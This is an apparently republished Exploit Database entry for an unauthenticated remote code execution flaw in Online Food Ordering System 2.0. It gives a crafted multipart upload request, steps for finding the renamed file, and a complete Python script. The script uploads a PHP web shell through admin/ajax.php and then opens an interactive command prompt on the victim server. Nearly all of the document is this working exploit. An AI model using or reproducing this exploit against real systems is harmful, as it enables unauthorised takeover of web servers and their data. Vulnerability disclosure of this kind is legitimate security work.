Online Food Ordering System 2.0 – Remote Code Execution (RCE) (Unauthenticated)

• Exploit Database
• 121 阅读

• 作者： Abdullah Khawaja
  日期： 2021-09-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50305/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183

  # Exploit Title: Online Food Ordering System 2.0 -Remote Code Execution (RCE) (Unauthenticated) # Exploit Author: Abdullah Khawaja (hax.3xploit) # Date: 2021-09-20 # Vendor Homepage: https://www.sourcecodester.com/php/14951/online-food-ordering-system-php-and-sqlite-database-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online_ordering.zip # Version: 2.0 # Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 # Description: Online Food Ordering System 2.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.   # Exploit Details:   # 1. Access the &apos;admin/ajax.php&apos;, as it does not check for an authenticated user session. # 2. Set the &apos;action&apos; parameter of the POST request to &apos;save_settings&apos;. # - <code>ajax.php?action=save_settings # 3. Capture request in burp and replace with with following request.   &apos;&apos;&apos; POST /fos/admin/ajax.php?action=save_settings HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------120025571041714278883588636251 Content-Length: 754 Origin: http://localhost Connection: close Referer: http://localhost/fos/admin/index.php?page=site_settings Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin   -----------------------------120025571041714278883588636251 Content-Disposition: form-data; name="name"   adsa -----------------------------120025571041714278883588636251 Content-Disposition: form-data; name="email"   asdsad@asda.com -----------------------------120025571041714278883588636251 Content-Disposition: form-data; name="contact"   asdsad -----------------------------120025571041714278883588636251 Content-Disposition: form-data; name="about"   asdsad -----------------------------120025571041714278883588636251 Content-Disposition: form-data; name="img"; filename="phpinfo.php" Content-Type: application/octet-stream   <?php echo phpinfo();?> -----------------------------120025571041714278883588636251-- &apos;&apos;&apos; # <code> Image uploader is renaming your payload using the following function. # strtotime(date(&apos;y-m-d H:i&apos;)).&apos;_&apos;.$_FILES[&apos;img&apos;][&apos;name&apos;]; # you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler # and print this function to get the value. e.g: <?php echo strtotime(date(&apos;y-m-d H:i&apos;)); ?> Output: 1632085200 # concate output with your playload name like this 1632085200_phpinfo.php # 4. Communicate with the webshell at &apos;/assets/img/1632085200_phpinfo.php?cmd=dir&apos; using GET Requests.   # RCE via executing exploit: # Step 1: run the exploit in python with this command: python3 OFOS_v2.0.py # Step 2: Input the URL of the vulnerable application: Example: http://localhost/fos/     import requests, sys, urllib, re import datetime from colorama import Fore, Back, Style   requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)           header = Style.BRIGHT+Fore.RED+&apos;&apos;+Fore.RED+&apos; Abdullah &apos;+Fore.RED+&apos;"&apos;+Fore.RED+&apos;hax.3xploit&apos;+Fore.RED+&apos;"&apos;+Fore.RED+&apos; Khawaja\n&apos;+Style.RESET_ALL   print(Style.BRIGHT+" Online Food Ordering System v2.0") print(Style.BRIGHT+"Unauthenticated Remote Code Execution"+Style.RESET_ALL) print(header)   print(r""" ______ _______ ________ ___//_/__/_______ __________ ______(_)_____ _ __,<____ \__ </code>/_ | /| / /__ <code>/____/___ </code>/ _/| | _/ / / /_/ /__ |/ |/ // /_/ /____/ / /_/ / /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___/\__,_/ /___/ abdullahkhawaja.com """)       GREEN =&apos;\033[32m&apos; # Green Text RED =&apos;\033[31m&apos; # Red Text RESET = &apos;\033[m&apos; # reset to the defaults   #proxies = {&apos;http&apos;: &apos;http://127.0.0.1:8080&apos;, &apos;https&apos;: &apos;https://127.0.0.1:8080&apos;}     #Create a new session s = requests.Session()     #Set Cookie cookies = {&apos;PHPSESSID&apos;: &apos;d794ba06fcba883d6e9aaf6e528b0733&apos;}   LINK=input("Enter URL of The Vulnarable Application : ")     def webshell(LINK, session): try: WEB_SHELL = LINK+&apos;/assets/img/&apos;+filename getdir= {&apos;cmd&apos;: &apos;echo %CD%&apos;} r2 = session.get(WEB_SHELL, params=getdir, verify=False) status = r2.status_code if status != 200: print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) r2.raise_for_status() print(Fore.GREEN+&apos;[+] &apos;+Fore.RESET+&apos;Successfully connected to webshell.&apos;) cwd = re.findall(&apos;[CDEF].*&apos;, r2.text) cwd = cwd[0]+"> " term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET while True: thought = input(term) command = {&apos;cmd&apos;: thought} r2 = requests.get(WEB_SHELL, params=command, verify=False) status = r2.status_code if status != 200: r2.raise_for_status() response2 = r2.text print(response2) except: print("\r\nExiting.") sys.exit(-1)     #Creating a PHP Web Shell   phpshell= { &apos;img&apos;: ( &apos;shell.php&apos;, &apos;<?php echo shell_exec($_REQUEST["cmd"]); ?>&apos;, &apos;application/octet-stream&apos;, {&apos;Content-Disposition&apos;: &apos;form-data&apos;} ) }   # Defining value for form data data = {&apos;name&apos;:&apos;test&apos;, &apos;email&apos;:&apos;info@sample.com&apos;, &apos;contact&apos;:&apos;+6948 8542 623&apos;,&apos;about&apos;:&apos;hello world&apos;}     def id_generator(): x = datetime.datetime.now() date_string = x.strftime("%y-%m-%d %H:%M") date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M") timestamp = datetime.datetime.timestamp(date) file = int(timestamp) final_name = str(file)+&apos;_shell.php&apos; return final_name   filename = id_generator() #Uploading Reverse Shell print("[*]Uploading PHP Shell For RCE...") upload = s.post(LINK+&apos;admin/ajax.php?action=save_settings&apos;, cookies=cookies, files=phpshell, data=data)   shell_upload = True if("1" in upload.text) else False u=shell_upload if u: print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) else: print(RED+"[-]Failed To Upload The PHP Shell!", RESET)       #Executing The Webshell webshell(LINK, s)